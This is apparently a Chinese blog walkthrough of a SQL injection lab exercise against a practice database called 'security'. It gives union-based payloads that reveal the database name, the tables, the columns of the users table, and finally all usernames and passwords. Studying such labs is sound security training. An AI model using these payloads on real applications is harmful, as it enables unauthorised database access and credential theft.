攻击姿势及语法较为简单,不再详细介绍。
判断注入类型

由上下两张图回显可知,注入类型为字符型注入

判断注入点个数

由上下两张图可知注入点个数为2

查库名
1' union select 1,database()#

数据库为security
查表名
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

回显四个表名
查列名
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')#

查数据
1' union select group_concat(username),group_concat(password) from security.users#

5万+

被折叠的 条评论
为什么被折叠?



